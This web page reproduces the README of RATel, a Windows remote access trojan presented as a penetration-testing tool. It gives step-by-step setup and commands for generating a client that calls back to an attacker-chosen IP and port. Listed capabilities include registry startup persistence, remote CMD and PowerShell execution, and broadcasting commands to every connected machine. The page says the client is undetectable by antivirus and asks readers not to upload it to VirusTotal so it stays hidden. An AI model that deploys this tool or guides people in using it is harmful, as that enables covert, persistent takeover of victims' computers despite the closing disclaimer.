RATel RAT for Take Control of a Windows Machine
RATel RAT for Take Control of a Windows Machine

RATel: RAT for Take Control of a Windows Machine

RAT-el is an open source penetration test tool that allows you to take control of a windows machine. It works on the client-server model, the server sends commands and the client executes the commands and sends the result back to the server. The client is completely undetectable by anti-virus software.

Please do not upload to virustotal

To prevent RATel from being detected by antivirus, please do not upload the payload to TOTAL VIRUS. Each month I will test myself if the payload gets detected by antivirus. So you’ll have a photo every month to prove RAtel’s discretion.

Screenshots RATel
Screenshots RATel

Features

RATelServer:

  • Multiple Connections
  • Broadcast commands to all clients
  • Stores client informations in the database
  • Encryption of data on the network via XOR
  • Token management system to identify clients

Client:

  • Encryption of data send over the network
  • Startup persistence
  • Remote command execution via CMD
  • Remote command execution via Powershell
  • Encryption of data on the network via XOR
  • Automatic persistence when running the client
  • Automatic reconnection

RATelGenerator:

  • Automatic client compilation

Installations

Windows Installation

Installation and configuration of all dependencies on Windows:

  • First step: Download and install Python3 and MinGw.

MinGw:

If you want to compile RATs (client) from Windows, you must have MinGw on your machine.

  1. Go to here then download and install MinGwInstaller.
  2. Once MinGwInstaller is installed, run MinGwInstaller then check “mingw32-gcc-g++”, then click on “installation” then click on “Changes”.
  3. Once all MinGw dependencies are installed, copy the folder path where MinGw binaries are normally located to “C:\MinGw\bin” and save this folder in the system variable PATH.
Install MinGw
Install MinGw

Python3:

You must have Python3 on your machine, because the server (RATelServer.py) and the generator (RATelGenerator.py) are both coded in Python3.

  1. Go to here to download Python 3 according to your architecture.
  2. Install Python3.

Make sure that Python and G++ (MinGw) can run from the Windows command, if one of the programs does not run, then add the program path to the PATH variable on your system.

Install Python3
Install Python3
  • Second step: Download the RATel repository.
  1. Go to here
  2. Click on “Code” and then click on “Download ZIP”.
  3. Once the repository is uploaded, you must get a zip file.
  4. Extract the zip file.
Download RATel
Download RATel
  • Third step: Run win_setup.py
  1. Go to the “RATel” folder previously downloaded and unzip .
  2. Then run the script “win_setup.py”.

The “win_setup.py” script allows to install all Python libraries, then to check if MinGw and Python are accessible from the Windows command.

If you get “Finished installation” it means that all dependencies for the RATel project are installed on your machine. If you get an error message, check all the steps previously mentioned in this tutorial. If you still get an error message, please leave me a way out at issues.

Run win_setup
Run win_setup

Linux Installation

This documentation is based on a Debian configuration, so the steps in this documentation will be identical for Debian-derived distributions like Kali Linux, Ubuntu, Tails, PureOSl, etc. I didn’t make documentation for other distributions, but the principle remains the same.

  • First step: Download and install Git, Python3 and MinGw.

To avoid any problems, update your system.

sudo apt-get update && sudo apt-get upgrade

installer Git, Python3, Pip3 et Mingw-w64:

sudo apt-get install git python3 python3-pip mingw-w64
  • Second step: Clone the RATel repository.
git clone https://github.com/FrenchCisco/RATel
  • Step 3: Install the dependencies for Python3.

Go to the “RATel/setup” folder.

cd RATel/setup

Install the dependencies.

pip3 install -r requirement.txt

RATelServer

RATelServer Argument

This documentation explains the operation of the server (RATelServer.py) and its functionalities.

The functioning of the server can vary depending on past arguments, that’s why I’ll try to make a rather general description of the server. 

When connecting a new client to the server, the client sends the first information: the token, the current RAT folder, the user rights and the user login. This step is called HANDSHAKE.

For each new client, the server assigns an ID which is presented as a session number. Once the HANDSHAKE is finished, the server stores all the information received (Session number, IP address, port, RAT path, user rights and user login) in a SQLite database.

This allows in case of network or other problems, to identify and reconnect the clients to the server.

Arguments

ArgumentSyntaxExampleCommant
-i / –ip--ip <ip of server>-i 127.0.0.1The ip address of the server, this is handy if you have several IP addresses.
-p / –port`–port “--port 4444The listening port of the server.
-t / –time--time <seconds>--time 120The number of seconds that a message is automatically sent to check if the connection is alive or dead.
-pa /–password--password <your password>--password ciscoTheBossThe password for encrypting and decrypting data on the network. If the password is not the same as the client then it will be impossible to decrypt the messages.
-c / –clean--clean--cleanCleans up all data in the SQLite database.
-d / –display--display--displayDisables the display of client information (logout and incoming connection).
-h / –help--help--helpshow this help message

Example of command:

/usr/bin/python3 RATelServer.py --port 8888 --password LinuxIsBestOS --time 120 --clean

This command allows to listen on port 8888, decrypt and encrypt data with the LinuxIsBestOS password, ping the client every 2 minutes and delete database data.

Usage RATelServer

RATelServer works with a mode system. Each mode has its specific commands

  • Main mode:

The main mode is the main mode of the server. It allows you to do many things like:

ArgumentSyntaxCommant
-h / –help--helpDisplays all main mode commands.
-ls / –list--listDisplays all customers with their information.
-t / –target--target <session_ID>This command allows you to select a client (Session Mode).
-cde / –connectionDisplayEnable-cdeEnable the display of information about
the client (connection and disconnection).
-cdd / –connectionDisplayDisable-cddDisable the display of client information (connection and disconnection).
–broadcast--broadcastStarts the broadcast mode.
–exit--exitStop the server.
Main mode
Main mode
  • Session mode:

The session mode allows you to select a session (client) and to interact with it, for example: Execute command, start persistence, etc.

ArgumentSyntaxCommant
-h / –help--helpDisplays all main mode commands.
-c-c <"command">Executes a command on all clients and does not send the result
(don’t forget to put the command in quotation marks).
–command--commandStarts a command prompt (cmd .exe) on the remote machine.
–powershell--powershellStarts a Powershell command (powershell.exe) on the remote machine.
–persistence--persistenceMakes the customer persistent at startup by changing keys
of the register
–destruction--destructionDeletes and disconnects all clients.
–disconnection--disconnectionComming soon.
-b / –back--backBack to menu.
Session mode
Session mode

Warning

Any commands executed with the ‘–command’ or ‘–powershell’ function will not be encrypted on the network. If you want to execute encrypted commands, use the argument -c .

  • Broadcast mode:

The broadcast mode allows to send an order to all customers.

ArgumentSyntaxCommant
-h / –help--helpDisplays all session mode commands.
-ls / –list--listStarts a command prompt (cmd .exe) on the remote machine.
-c-c <"command">Executes a command on all clients and does not send the result
(don’t forget to put the command in quotation marks).
–persistence--persistenceMakes all clients persistent at startup by modifying the registry keys.
–destruction--destructionRemoves all clients on all clients and cuts connections.
–disconnection--disconnectionComming soon.
-b / –back--backBack to menu.
Broadcast mode
Broadcast mode

Exemple command: Sends to all customers the explorer.exe command

broadcast> -c "explorer.exe"

Usage RATelGenerator

RATelGenerator allows to compile RATs (client), RATs are compiled with Mingw.

The script takes into account many arguments, which allows to have a wider and more targeted control according to your situation or requirement.

The behavior of the RAT changes according to the past arguments. The only mandatory argument is IP to determine which IP address the RAT will try to connect to.

Arguments:

ArgumentSyntaxexampleCommant
-h / –help--help--helpShow this help message
-a / –auto--auto--autoActivates persistence mode as soon as
the client is executed.
-p / –port--port <port>--port 8888The port number where the client should
connect to.
-i / –ip--ip <address ip>--ip 192.168.1.32L’adresse IP du serveur.
-r / –reconnect--reconnect <time>--reconnect 10The number of wait times between
each reconnection attempt
to the server (in seconds).
-n / –name--name <name of rat>--name my_rat.exeThe name of the RAT.
-rs / –registry--registry <name>--registry win_keyThe name of the string value
of the key for persistence.
-pa / –password--password <password>--password linusIsBestOSThe password to encrypt and
decrypt data on the network.

Exemple:

/usr/bin/python3 RATelGenerator.py --ip 192.168.1.34 --port 8888 --name RATclient.exe --password linuxIsBestOS

Disclaimer

The use of this software on any device that is not yours is prohibited. If you use RATel on a machine that does not belong to you, I will in no way be responsible for your actions.

Dark Mode

RATel (this link opens in a new window) by FrenchCisco (this link opens in a new window)

RAT-el is an open source penetration test tool that allows you to take control of a windows machine. It works on the client-server model, the server sends commands and the client executes the commands and sends the result back to the server. The client is completely undetectable by anti-virus software.

More Stories
BlackMamba Framework de Mando y Control Post Exploitación
BlackMamba: C2/Post-Exploitation Framework